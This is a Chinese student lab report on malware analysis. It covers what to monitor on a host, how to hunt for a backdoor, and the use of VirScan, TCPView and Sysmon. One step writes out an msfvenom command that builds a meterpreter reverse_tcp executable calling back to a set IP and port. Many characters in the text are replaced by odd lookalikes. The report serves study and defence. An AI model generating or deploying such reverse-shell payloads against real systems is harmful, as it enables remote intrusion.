20145338 索朗卓嘎 《网络对抗》 恶意代码分析

恶意代码分析

问题回答

·总结一下监控一个系统一般须要监控什么、用什么来监控。

一般须要监控注册表信息、进程、端口、服务、ip地址、数据流还有文件的行为记录以及权限。

能够用：TCPview工具查看系统的TCP链接信息；ireshark进行抓包分析，查看网络链接；sysmon用来监视和记录系统活动。

·若是在工做中怀疑一台主机上有恶意代码，请设计下你准备如何找到对应进程、恶意代码相关文件。

重启计算机，并对计算机的注册表，进程，端口，服务等内容进行检测，并使用抓包软件进行抓包，经过观察注册表，进程等内容的变化筛选出可疑的对象，而后针对可疑的对象在抓包过程当中具体分析，看看有没有能够的创建套接字（也就是链接其余IP地址）的可疑操做，观察能够对象的流量是否异常，对数据包类型解析看看是否有可疑的内容，查看该程序是否获取咱们主机权限，经过这些手段相结合还筛选出后门可能性较大的进程找到相应的代码进行深刻分析和排查来找到恶意代码。

实验总结与体会

作实验以前都是在紧张的睡觉、紧张的在玩手机、紧张的娱乐，可就是不想作 好难好难 非要拖到最后一刻。啊 作完 就轻松许多·····
遇到不会的东西要多耐心 思考与尝试，或许会有surprise。

实践过程记录

首先使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.164 PORT=5338-f exe > slzg2test.exe生成meterpreter可执行文件。
经过VirScan（http://www.virscan.org/）的行为分析来分析恶意代码：

[](http://images2015.cnblogs.com/blog/886524/201704/886524-20170407210214238-1916820006.png）

扫描文件后等待片刻出现文件"行为分析"后点击查看分析，他会出现文件的基本信息、网络行为、注册表行为和其余行为 。

恶意代码动态分析

·下载项目附件的SysinternalsSuite201608，里面有须要用的应用程序

Tcpview

Tcpview用于查看进行tcp链接的进程，能够看到端口、目的ip等信息。

·sysmon工具
查看老师给的[使用轻量级工具Sysmon监视你的系统]快速安装在管理员模式下快速安装

配置xml文件sysmon -c slzg.xml，

并使用sysmon -c查看配置；

进入任务管理器，发现sysmon已经成功启动

而后在在计算机管理工具-事件查看器下查看日志信息

实现一个每五分钟记录有哪些程序在网络 创建一个5338.TXT文件